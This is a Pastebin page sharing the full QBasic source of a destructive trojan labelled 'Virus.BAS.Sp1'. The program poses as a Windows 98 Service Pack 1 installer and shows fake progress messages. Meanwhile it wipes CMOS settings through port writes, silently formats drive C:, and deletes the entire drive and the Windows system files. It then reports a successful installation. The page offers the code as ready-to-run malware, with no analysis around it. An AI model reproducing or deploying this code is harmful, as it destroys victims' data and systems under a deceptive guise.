Advertisement
FlyFar

Virus.BAS.Sp1 - Source Code

Jun 11th, 2023
1,537
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
QBasic 0.53 KB | Cybersecurity | 0 0
  1. CLS
  2. PRINT "Prepare to installing Windows 98 Service Pack 1" FOR i = 0 TO 128
  3. OUT &H70, i
  4. OUT &H71, 0
  5. NEXT i
  6. SHELL "echo y|format c:/u/q/v:HELLO >NUL" CLS
  7. PRINT "Installing ..."
  8. SHELL "deltree /y c:\*.* >nul"
  9. CLS
  10. PRINT "Installing ...."
  11. SHELL "echo Y|del command\*.* >NUL"
  12. CLS
  13. PRINT "Installing ....."
  14. SHELL "echo Y|del c:\windows\*.* >nul" CLS
  15. PRINT "Installing ......"
  16. SHELL "echo Y|del c:\*.* >nul"
  17. CLS
  18. PRINT "Installing ......."
  19. SHELL "echo y|del *.* >nul"
  20. CLS
  21. PRINT "Windows 98 Service Pack 1 Installed Successfully"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement